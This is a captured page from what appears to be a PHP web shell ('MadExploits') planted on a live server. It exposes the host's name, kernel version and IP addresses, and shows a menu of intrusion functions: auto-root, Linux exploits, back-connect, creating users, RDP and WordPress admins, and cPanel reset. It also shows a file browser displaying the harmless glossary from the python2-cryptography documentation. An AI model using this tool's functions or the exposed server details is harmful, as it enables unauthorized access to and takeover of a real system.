Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.223.43.151
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python2-cryptography-1.7.2 /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
_static
[ DIR ]
drwxr-xr-x
development
[ DIR ]
drwxr-xr-x
hazmat
[ DIR ]
drwxr-xr-x
x509
[ DIR ]
drwxr-xr-x
Makefile
5.46
KB
-rw-r--r--
api-stability.rst
1.63
KB
-rw-r--r--
changelog.rst
30
B
-rw-r--r--
community.rst
609
B
-rw-r--r--
conf.py
5.55
KB
-rw-r--r--
cryptography-docs.py
1.72
KB
-rw-r--r--
doing-a-release.rst
3.07
KB
-rw-r--r--
exceptions.rst
853
B
-rw-r--r--
faq.rst
3.51
KB
-rw-r--r--
fernet.rst
6.44
KB
-rw-r--r--
glossary.rst
3.09
KB
-rw-r--r--
index.rst
2.93
KB
-rw-r--r--
installation.rst
9.41
KB
-rw-r--r--
limitations.rst
949
B
-rw-r--r--
make.bat
4.99
KB
-rw-r--r--
random-numbers.rst
1.27
KB
-rw-r--r--
security.rst
4.76
KB
-rw-r--r--
spelling_wordlist.txt
883
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : glossary.rst
Glossary ======== .. glossary:: :sorted: plaintext User-readable data you care about. ciphertext The encoded data, it's not user readable. Potential attackers are able to see this. encryption The process of converting plaintext to ciphertext. decryption The process of converting ciphertext to plaintext. key Secret data is encoded with a function using this key. Sometimes multiple keys are used. These **must** be kept secret, if a key is exposed to an attacker, any data encrypted with it will be exposed. symmetric cryptography Cryptographic operations where encryption and decryption use the same key. public-key cryptography asymmetric cryptography Cryptographic operations where encryption and decryption use different keys. There are separate encryption and decryption keys. Typically encryption is performed using a :term:`public key`, and it can then be decrypted using a :term:`private key`. Asymmetric cryptography can also be used to create signatures, which can be generated with a :term:`private key` and verified with a :term:`public key`. public key This is one of two keys involved in :term:`public-key cryptography`. It can be used to encrypt messages for someone possessing the corresponding :term:`private key` and to verify signatures created with the corresponding :term:`private key`. This can be distributed publicly, hence the name. private key This is one of two keys involved in :term:`public-key cryptography`. It can be used to decrypt messages which were encrypted with the corresponding :term:`public key`, as well as to create signatures, which can be verified with the corresponding :term:`public key`. These **must** be kept secret, if they are exposed, all encrypted messages are compromised, and an attacker will be able to forge signatures. authentication The process of verifying that a message was created by a specific individual (or program). Like encryption, authentication can be either symmetric or asymmetric. Authentication is necessary for effective encryption. ciphertext indistinguishability This is a property of encryption systems whereby two encrypted messages aren't distinguishable without knowing the encryption key. This is considered a basic, necessary property for a working encryption system. text This type corresponds to ``unicode`` on Python 2 and ``str`` on Python 3. This is equivalent to ``six.text_type``. nonce A nonce is a **n**\ umber used **once**. Nonces are used in many cryptographic protocols. Generally, a nonce does not have to be secret or unpredictable, but it must be unique. A nonce is often a random or pseudo-random number (see :doc:`Random number generation </random-numbers>`). Since a nonce does not have to be unpredictable, it can also take a form of a counter.
Close